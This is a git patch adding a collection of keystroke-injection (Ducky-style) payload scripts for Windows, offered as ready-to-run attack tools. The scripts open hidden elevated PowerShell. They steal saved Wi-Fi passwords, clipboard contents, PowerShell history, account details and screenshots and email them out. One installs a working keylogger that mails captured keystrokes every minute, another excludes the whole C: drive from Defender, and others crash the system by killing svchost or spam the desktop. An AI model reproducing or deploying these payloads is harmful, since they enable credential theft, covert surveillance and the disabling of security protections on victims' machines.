From df9547205ea1ec7d8651de59e19ad5983d7670e6 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:18:54 +0000 Subject: [PATCH] Add files via upload --- OSINT/Email System & User Information.txt | 56 ++ OSINT/Email System Info with Screenshot.txt | 61 +++ ...stalled Programs and Eventlogs to File.txt | 26 + OSINT/Keylogger to Email.txt | 484 ++++++++++++++++++ Pranks/5 second Screen Kill.txt | 20 + Pranks/BSOD.txt | 21 + Pranks/Dsktop Shortcut Spammer.txt | 24 + Pranks/Invoke Fake Update (.vbs).txt | 44 ++ Pranks/Rickroll with Max Volume spam.txt | 51 ++ Pranks/Start Windows-93 (parody edition).txt | 33 ++ Tools/Add Exclusion C-drive.txt | 23 + Tools/Base64 Decode & Execute.txt | 30 ++ Tools/Disable RT-Protection.txt | 30 ++ Tools/Download-Execute from Run Prompt.txt | 23 + Tools/Set US Keyboard & System Language.txt | 30 ++ Tools/Simple NetCat Client.txt | 28 + 16 files changed, 984 insertions(+) create mode 100644 OSINT/Email System & User Information.txt create mode 100644 OSINT/Email System Info with Screenshot.txt create mode 100644 OSINT/Installed Programs and Eventlogs to File.txt create mode 100644 OSINT/Keylogger to Email.txt create mode 100644 Pranks/5 second Screen Kill.txt create mode 100644 Pranks/BSOD.txt create mode 100644 Pranks/Dsktop Shortcut Spammer.txt create mode 100644 Pranks/Invoke Fake Update (.vbs).txt create mode 100644 Pranks/Rickroll with Max Volume spam.txt create mode 100644 Pranks/Start Windows-93 (parody edition).txt create mode 100644 Tools/Add Exclusion C-drive.txt create mode 100644 Tools/Base64 Decode & Execute.txt create mode 100644 Tools/Disable RT-Protection.txt create mode 100644 Tools/Download-Execute from Run Prompt.txt create mode 100644 Tools/Set US Keyboard & System Language.txt create mode 100644 Tools/Simple NetCat Client.txt diff --git a/OSINT/Email System & User Information.txt b/OSINT/Email System & User Information.txt new file mode 100644 index 0000000..1e823de --- /dev/null +++ b/OSINT/Email System & User Information.txt @@ -0,0 +1,56 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE" + +REM main powershell code +ENTER +DELAY 100 +STRING $usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassw: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) + +STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 1;exit +ENTER \ No newline at end of file diff --git a/OSINT/Email System Info with Screenshot.txt b/OSINT/Email System Info with Screenshot.txt new file mode 100644 index 0000000..4aa9f42 --- /dev/null +++ b/OSINT/Email System Info with Screenshot.txt @@ -0,0 +1,61 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *IMPORTANT NOTE - upon testing 7th may 23, this script is detected by defender and blocked* +REM TURN OFF RT-PROTECTION BEFORE RUNNING + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING ;$email = "EMAIL_HERE";$pass = "PASSWORD_HERE" + +REM main powershell code +STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassword: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$scfile = "$env:temp\SC.png";Add-Type -AssemblyName System.Windows.Forms;Add-type -AssemblyName System.Drawing +STRING ;$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$Left = $Screen.Left;$Top = $Screen.Top +STRING ;$bitmap = New-Object System.Drawing.Bitmap $Width, $Height;$graphic = [System.Drawing.Graphics]::FromImage($bitmap) +STRING ;$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size);$bitmap.Save($scfile, [System.Drawing.Imaging.ImageFormat]::png) + +STRING ;Sleep 3;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $email, ($pass | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) +STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 10;exit +ENTER \ No newline at end of file diff --git a/OSINT/Installed Programs and Eventlogs to File.txt b/OSINT/Installed Programs and Eventlogs to File.txt new file mode 100644 index 0000000..25052e0 --- /dev/null +++ b/OSINT/Installed Programs and Eventlogs to File.txt @@ -0,0 +1,26 @@ +REM Title: Programs and Eventlogs to File +REM Author: @beigeworm +REM Description: Uses Powershell to gather a list of installed programs and Windows Eventlogs and saves the info to a file. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM the main powershell script. +STRING $date = Get-Date -Format "yyyy-MM-dd-hh-mm-ss";$outputPath = "$env:temp\Osint-$date.txt";New-Item -ItemType File -Path $outputPath +STRING ;$installed = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version, Vendor;$hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object -Property HotFixID, Description, InstalledOn +STRING ;$removed = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object -Property DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null} +STRING ;$installed | Format-Table -AutoSize | Out-File -FilePath $outputPath ;$hotfixes | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append +STRING ;$removed | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append;$userActivity = Get-EventLog -LogName Security -EntryType SuccessAudit | Where-Object {$_.EventID -eq 4624 -or $_.EventID -eq 4634} +STRING ;$userActivity | Out-File -FilePath $outputPath -Append;$hardwareInfo = Get-EventLog -LogName System | Where-Object {$_.EventID -eq 12 -or $_.EventID -eq 13};$hardwareInfo | Out-File -FilePath $outputPath -Append +STRING ;sleep 30;exit +ENTER diff --git a/OSINT/Keylogger to Email.txt b/OSINT/Keylogger to Email.txt new file mode 100644 index 0000000..65d1e41 --- /dev/null +++ b/OSINT/Keylogger to Email.txt @@ -0,0 +1,484 @@ +REM Title: Email System & User Info (old) +REM Author: @beigeworm +REM Description: Uses Powershell to gather system info and send it via Email. +REM Target: Windows 10 + +REM *NOTE* - There are a lot of ESCAPE characters half way down because typing speed is too fast for notepad. (Can be avoided by moving the mouse while flipper types) +REM this is a quick and dirty fix that i will revise in the near future. + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) +REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM Open Notepad for script building. +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 2500 +STRING Do{$FromTo = "YOUR_EMAIL";$Pass = "YOUR_PASSWORD";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt" +ENTER +STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force) +ENTER +STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +ENTER +STRING '@ +ENTER +ENTER +STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ +ENTER +STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock +ENTER +STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder +ENTER +STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} +ENTER +STRING $getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl +ENTER +STRING Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5) +ENTER +DELAY 1000 + +REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types) +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE + + +DELAY 10000 +REM save in temp directory. +DELAY 1000 +CTRL-SHIFT s +DELAY 1500 +STRING %temp% +ENTER +STRING txtlog.ps1 +DELAY 500 +TAB +DOWN +DOWN +ENTER +ENTER +DELAY 1000 +ALT F4 + +REM Open Powershell and start logs. +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +ENTER + diff --git a/Pranks/5 second Screen Kill.txt b/Pranks/5 second Screen Kill.txt new file mode 100644 index 0000000..ff855f8 --- /dev/null +++ b/Pranks/5 second Screen Kill.txt @@ -0,0 +1,20 @@ +REM Title: 5 Second Display Kill +REM Author: @beigeworm +REM Description: Uses Powershell to kill all displays for a short period of time. +REM Target: Windows 10,11 + + +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING (Add-Type '[DllImport("user32.dll")]public static extern int SendMessage +STRING (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit +ENTER diff --git a/Pranks/BSOD.txt b/Pranks/BSOD.txt new file mode 100644 index 0000000..edb5ba8 --- /dev/null +++ b/Pranks/BSOD.txt @@ -0,0 +1,21 @@ +REM Title: Invoke BSOD +REM Author: @beigeworm +REM Description: This will open powershell and cause a blue screen. +REM Target: Windows 10 + +REM ***This is a dangerous script - Be Careful!!!*** + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING taskkill /f /im svchost.exe +ENTER diff --git a/Pranks/Dsktop Shortcut Spammer.txt b/Pranks/Dsktop Shortcut Spammer.txt new file mode 100644 index 0000000..bf7a47c --- /dev/null +++ b/Pranks/Dsktop Shortcut Spammer.txt @@ -0,0 +1,24 @@ +REM Title: Dsktop Shortcut Spammer +REM Author: @beigeworm +REM Description: Uses Powershell to generate a specified amount of shortcuts on the desktop. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace 200 with the number of shortcuts you want to create.* +STRING $n = 200;$i = 0;while($i -lt $n){;$num = Get-Random;$Location = "C:\Windows\System32\rundll32.exe" + +REM rest of the script. +STRING ;$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") +STRING ;$Shortcut.TargetPath = $Location;$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll";$Shortcut.IconLocation = "hotplug.dll,0" +STRING ;$Shortcut.Description ="Device Removal";$Shortcut.WorkingDirectory ="C:\Windows\System32";$Shortcut.Save();Start-Sleep -Milliseconds 10;$i++};sleep 10;exit \ No newline at end of file diff --git a/Pranks/Invoke Fake Update (.vbs).txt b/Pranks/Invoke Fake Update (.vbs).txt new file mode 100644 index 0000000..c3af84b --- /dev/null +++ b/Pranks/Invoke Fake Update (.vbs).txt @@ -0,0 +1,44 @@ +REM Title: Invoke Fake Windows Update +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to open Chrome and fullscreen. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 200 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to start chrome and go fullscreen. +STRING cmd +ENTER +STRING cd $env:temp +ENTER +STRING copy con update.vbs +ENTER +STRING Set WshShell = WScript.CreateObject("WScript.Shell") +ENTER +STRING WshShell.Run "chrome.exe -new--window -kiosk https://fakeupdate.net/win8", 1, False +ENTER +STRING WshShell.Run "C:\Windows\System32\scrnsave.scr /s" +ENTER +STRING WScript.Sleep 200 +ENTER +STRING WshShell.SendKeys "{F11}" +ENTER +CTRL z +ENTER +STRING start update.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + + diff --git a/Pranks/Rickroll with Max Volume spam.txt b/Pranks/Rickroll with Max Volume spam.txt new file mode 100644 index 0000000..220d077 --- /dev/null +++ b/Pranks/Rickroll with Max Volume spam.txt @@ -0,0 +1,51 @@ +REM Title: Rickroll with Max Volume spam +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to keep the volume maxed. +STRING cmd +ENTER +STRING copy con volup.vbs +ENTER +STRING do +ENTER +STRING Set WshShell = CreateObject("WScript.Shell") +ENTER +STRING WshShell.SendKeys(chr(&hAF)) +ENTER +STRING WScript.Sleep 10 +ENTER +STRING loop +ENTER +CTRL z +ENTER +STRING start volup.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + +REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up. +GUI r +DELAY 1000 +STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ +ENTER +DELAY 2000 +STRING f + + + diff --git a/Pranks/Start Windows-93 (parody edition).txt b/Pranks/Start Windows-93 (parody edition).txt new file mode 100644 index 0000000..4c8015e --- /dev/null +++ b/Pranks/Start Windows-93 (parody edition).txt @@ -0,0 +1,33 @@ +REM Title: Start Windows-93 (parody edition) +REM Author: @beigeworm +REM Description: Kills all running egde processes then opens edge in fullscreen on windows-93. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open cmd and kill edge. +GUI r +DELAY 500 +STRING cmd +DELAY 200 +CTRL-SHIFT ENTER +DELAY 1000 +ALT y +DELAY 1000 +STRING taskkill /F /IM msedge.exe /T > nul +DELAY 100 +ENTER +DELAY 500 +STRING exit +ENTER + +REM open edge and fullscreen. +DELAY 500 +GUI r +DELAY 500 +STRING msedge -kiosk www.windows93.net +DELAY 100 +ENTER +DELAY 1000 +F11 \ No newline at end of file diff --git a/Tools/Add Exclusion C-drive.txt b/Tools/Add Exclusion C-drive.txt new file mode 100644 index 0000000..32774f3 --- /dev/null +++ b/Tools/Add Exclusion C-drive.txt @@ -0,0 +1,23 @@ +REM Title: Add Exclusion C-drive +REM Author: @beigeworm +REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM add the exclusion path. +STRING Add-MpPreference -ExclusionPath C:/ +ENTER +DELAY 250 +STRING exit +ENTER diff --git a/Tools/Base64 Decode & Execute.txt b/Tools/Base64 Decode & Execute.txt new file mode 100644 index 0000000..8bef849 --- /dev/null +++ 